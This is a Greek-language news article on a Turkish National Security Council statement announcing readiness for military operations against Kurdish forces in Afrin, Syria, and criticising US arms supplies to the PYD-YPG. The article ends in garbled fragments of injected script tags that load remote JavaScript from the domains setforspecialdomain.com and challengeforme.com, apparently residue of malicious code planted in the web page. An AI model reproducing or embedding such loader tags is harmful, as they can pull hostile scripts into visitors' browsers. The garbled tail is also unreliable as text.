Τουρκία: Ετοιμη για εισβολή στο Αφρίν της Συρίας-Επίθεση σε ΗΠΑ για τον εξοπλισμό των Κούρδων

Νέα φωτιά πολέμου στη Συρία, ετοιμάζεται να βάλει η Αγκυρα, για να προστατέψει όπως λέει, τα εθνικά της συμφέροντα και την ασφάλεια των πολιτών της. Το Εθνικό Συμβούλιο Ασφαλείας της Τουρκίας ξεκαθάρισε την αποφασιστικότητα του για μια νέα στρατιωτική περιπέτεια στο βόρειο κομμάτι της γειτονικής χώρας.

Σύμφωνα με την ανακοίνωση του Εθνικού Συμβουλίου:

«Πέρα από την εξασφάλιση της ασφάλειας των συνόρων μας, με απώτερο στόχο την εξασφάλιση της ασφάλειας ζωής και περιουσίας των πολιτών μας και των κατοίκων της περιοχής, σε πρώτη φάση, υπογραμμίστηκε η αποφασιστικότητα για την άμεση λήψη πρωτοβουλιών για την εξουδετέρωση των απειλών που στρέφονται από τα δυτικά εδάφη της Συρίας (προς τα εδάφη της Τουρκίας)».

Στην ίδια γραπτή ανακοίνωση, επισημαίνεται:

«Επισημάνθηκε ότι η χώρα μας, εκπληρώνοντας τις υποχρεώσεις της που προέρχονται από οργανώσεις που συμμετάσχει και τις διεθνείς συμβάσεις που συμπεριλαμβάνουν την καταπολέμηση της τρομοκρατίας, συμβάλλει σημαντικά στην περιφερειακή και παγκόσμια ειρήνη. Η Τουρκία αναμένει την ίδια υπεύθυνη στάση και από τους συμμάχους της».

Το Εθνικό Συμβούλιο Ασφαλείας της Τουρκίας εξαπολύει επίθεση στις ΗΠΑ για τον εξοπλισμό των Κούρδων της Συρίας ζητώντας τον αφοπλισμό τους. «Σε μια περίοδο που υπάρχουν ξεκάθαρες απειλές των τρομοκρατικών οργανώσεων κατά της χώρας μας, υπό την σκέπη του ΝΑΤΟ, μια συμμαχική χώρα, δεν λαμβάνει υπόψη της την ασφάλεια μας και ανακηρύσσει ως συνεταίρους τους τρομοκράτες. Αυτή η εξέλιξη προκαλεί λύπη. (Το Εθνικό Συμβούλιο Ασφαλείας) υπογράμμισε ότι πρέπει να παρθούν μια ώρα αρχύτερα πίσω τα όπλα και τα πολεμοφόδια που δόθηκαν στην τρομοκρατική οργάνωση PKK/PYD-YPG, εφόσον έχει ολοκληρωθεί σε μεγάλο βαθμό ο πόλεμος με το Ισλαμικό Κράτος».

Στο ανακοινωθέν επαναλαμβάνεται η γνωστή θέση της Τουρκίας για το ζήτημα των Ιεροσολύμων και τονίζεται ότι το συμβούλιο αποφάσισε να προτείνει την παράταση του καθεστώτος εκτάκτου ανάγκης για την διαφύλαξη των ελευθεριών και του δημοκρατικού πολιτεύματος..___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>